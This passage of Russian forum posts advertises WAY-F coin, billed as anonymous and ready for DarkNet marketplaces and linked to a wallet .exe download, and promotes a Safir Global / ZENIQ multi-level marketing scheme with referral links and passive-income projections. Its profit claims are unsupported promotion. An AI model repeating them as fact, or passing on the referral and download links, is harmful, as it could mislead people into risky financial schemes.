Tor, сервисы VPN и т.д. Соответственно третьим лицам узнать ключи шифрования или какие либо данные попросту невозможно. Стабильная скорость транзакций Команда монеты позаботилась о пропускной способности блокчейн сети ещё на старте, применив передовые решения на сегодняшний день. Адаптивный размер блока меняется в зависимости от числа обрабатываемых одновременно транзакций, что гарантирует стабильное и быстрое их подтверждение. Алгоритм VRX проверяет последние 6 блоков в цепочке после каждого нового сформированного блока и настраивает сложность сети для обеспечения постоянного времени создания блоков. Интеграция монеты на любую площадку или платформу Важно то, что по технической составляющей монета полностью готова к использованию в сети DarkNet. Помимо этого в Интернете также есть масса торговых площадок и платформ, на которых востребованы анонимность данных и платежей как между потребителем и продавцом, так и в отношении третьих лиц. Технология TRUECONNECT обеспечивает органическую интеграцию монеты как средство полностью анонимных платежей и переводов. Данная технология позволяет интегрировать WAY-F coin на абсолютно любую торговую площадку и способствует выходу на международный потребительский рынок. На сегодняшний день уже есть успешные примеры оплаты монетами WAY-F за товары и услуги. Всё уже готово к использованию, просто подайте заявку на интеграцию через тех. поддержку на сайте WAYFcoin.com. Как уже сегодня получать доход вместе с WAY-F coin? Два алгоритма майнинга Уникальной особенностью монеты является то, что майнинг через программный кошелёк(https://github.com/wayfcoin/source/releases/download/2/Wayfcoin-qt.exe) ведется параллельно по двум алгоритмам Proof-of-Work и Proof-of-Stake. Участники сети всегда могут выбрать для себя наиболее удобный и выгодный алгоритм майнинга. PoW майнинг ведется по наиболее совершенному из современных на данный момент алгоритмов — X11, который радикально отличается от используемого в Bitcoin алгоритма SHA-256. Алгоритм x11 устойчив к ASIC майнингу, являющийся первостепенной причиной централизации блокчейн сети и атаки 51% на сегодняшний день. Proof-of-Credit – уникальный алгоритм для майнинг пула WAYFcoin.com, являющийся дополнением к Proof-of-Stake. Данный алгоритм предназначен для равноправного распределения вознаграждения от добычи блока среди всех участников сообщества. Технические характеристики WAY-F Coin Алгоритм майнинга: X11 Размер сообщения TxComment: Max 1024 байта Время блока: 5-10 минут Размер блока: 2 Mb Порт P2P: 49055 Тикер: WAYF Язык программирования: C++ Общая эмиссия: 120 000 000 WAYF Премайн: 6 000 000 WAYF Вознаграждение PoW: 4 WAYF Diff retarget: VRX Every Block Price Цена Masternode: 5000 WAYF Общее число монет жестко ограничено. После создания 120 000 000 WAYF майнинг будет полностью остановлен. ============================= Официальный сайт монеты: https://wayfcoin.com/ Whitepaper монеты: https://wayfcoin.com/whitePaper
  25. Safir Global International in Russia ПРОДУКТЫ ВВЕДЕНИЕ ИТ-индустрия процветает и имеет наибольшее значение для создания цифрового мира. Это относится к набору оборудования предприятия, которое помогает создавать, тестировать, эксплуатировать и поддерживать службы информационных технологий. В современную цифровую эпоху у клиентов есть ожидания от ИТ, поскольку это основа, которая помогает компаниям становиться гибкими, ориентированными на обслуживание и способными предоставлять своим клиентам неожиданные и удовлетворяющие их впечатления. Safir Global DMCC-это известная компания по ИТ-оборудованию в ОАЭ, которая предлагает услуги, связанные с ИТ-оборудованием, чтобы помочь бизнесу соответствовать своим требованиям в цифровом мире. Мы все готовы объединить наш обширный, богатый отраслевой опыт и знания, чтобы помочь нашим клиентам извлечь максимальную выгоду из своих инвестиций в ИТ. ЦЕННОСТЬ ЛУЧШИЙ СЕРВИС В мире, который постоянно меняется, мы являемся сильными и надежными партнерами как для малого бизнеса, так и для крупных организаций. Наша преданная команда сосредоточена на обеспечении наилучшего обслуживания и поддержки для всех наших клиентов. ДО НАСТОЯЩЕГО ВРЕМЕНИ Мы держим руку на пульсе технологий, чтобы предоставлять вам только новейшее оборудование и программное обеспечение, которые облегчают вашу работу и помогают вам справляться с самыми сложными ситуациями. ЛУЧШЕЕ БУДУЩЕЕ В Safir Global DMCC мы искренне верим, что технологии являются лучшими, когда они объединяют людей, поэтому приходите и присоединяйтесь к нам, и давайте вместе построим лучшее будущее! МЕЖДУНАРОДНАЯ КОМПАНИЯ SAFIR GLOBAL & ZENIQ TECHNOLOGIES МАРКЕТИНГ КОМПАНИИ ✅ Единый уровень (до 15 уровней) ✅ Карьерный бонус ✅ Бонусный фонд ⛔️ НЕ инвестиционный проект с очень крутыми карьерными бонусами. ?Товарный бизнес с применением новейших технологий Blockchain CrossFI & Blockchain International Company Очень все интересно и не просто. ?У руля не актеры, а более чем авторитетные люди. ?Официальный старт проекта будет в конце октября в Дубай. ?Чем быстрее взять HUB, тем больше он в последствии будет приносить монет ZENIQ. Не является рекомендацией, у всех своя голова. МИССИЯ КОМПАНИИ Объединение традиционного банковского дела и криптовалют на одной платформе, где люди могут построить собственный бизнес и обеспечить стабильный доход с помощью платформы ZENIQ ? Подробнее о компании на сайте. https://safir-global.ru/ и https://zeniq-coin.ru/ ❗️ Пресса / Медиа ▪️https://bit.ly/cryptovoizezeniq ▪️https://bit.ly/thetokenizerzeniq ▪️https://bit.ly/arabianbusinesszeniq ▪️https://bit.ly/wozingazeniq ▪️https://bit.ly/mideastzeniq ‼️ ВНИМАНИЕ ОЧЕНЬ ВАЖНО‼️ ✅ При регистрации не обязательно вносить депозит, чтобы начать зарабатывать. Сразу работает 1 линия ? ? РЕГИСТРАЦИЯ В КОМАНДУ ? https://safir.com/ref/fg5vbqrs2m Остались вопросы? ? Пишите: https://t.me/Alexsandr81 ? Наша группа: ? https://t.me/SafirGlobal_Official Курс токена ZENIQ на UniSwap https://info.uniswap.org/#/tokens/0x5b52bfb8062ce664d74bbcd4cd6dc7df53fd7233 ✅ ДОХОДНОСТЬ на полном пассиве с каждых 1000 проданных устройств падает на 4%, но курс при этом должен расти курс с внедрением новых продуктов и выхода на биржи. Расчёт доходности: ▪️Единица (HUB цена 1500€) 690 монет в месяц. В сутки 23 монеты. Расчёты приблизительные и данная величина не постоянная ✅ ИТОГ ?Если вы хотите зарабатывать пассивно или как лидер сетевого маркетирга, вам нужно быть здесь! Safir International, официального партнера по продажам ZENIQ. ?ZENIQ Hub - ВАШ собственный цифровой актив в безопасности с вашей собственной машиной для чеканки цифровых монет ZENIQ Hub - это выдающееся оборудование с системой безопасности и участия, с которой раньше не было равных!? ?Эта денежная машина работает день и ночь! Мы приглашаем вас ознакомиться с нашим предложением как инвестору или как сетевику, извлекая выгоду из великолепного маркетингового плана с вводом в эксплуатацию на 15 уровнях. Если вы хотите зарабатывать пассивно или как лидер сетевого маркетирнга, Вам нужно быть здесь! ? Монета ZENIQ принесет безумные выгоды ?Листинг на бирже ZENIQ Coins в первом квартале 2021 года ?Накопление капитала для всех » ZENIQ Coins » Децентрализованная биржа (с минимальными сборами) » Триллионный рынок благодаря токенизации » И многое другое » Ограниченное количество монет ? Огромный потенциал увеличения стоимости монет благодаря следующему: - Ограниченное количество на HUB 01 с полной мощностью чеканки - «Халвинг» каждый год ?- Еженедельная «выдача прибыли» биржи ZENIQ для пассивного дохода ?- Токенизация проектов ZENIQ и других проектов ?Монета ZENIQ принесет безумные выгоды ?Не упустите свой шанс ! Оборот ??? ?Наконец-то свой ? БАНК ? ⛳ ️РЕГИСТРАЦИЯ ? ? ? https://safir-global.ru/ и https://zeniq-coin.ru/ ?Или по реф. ссылке https://safir.com/ref/fg5vbqrs2m
×
×
  • Создать...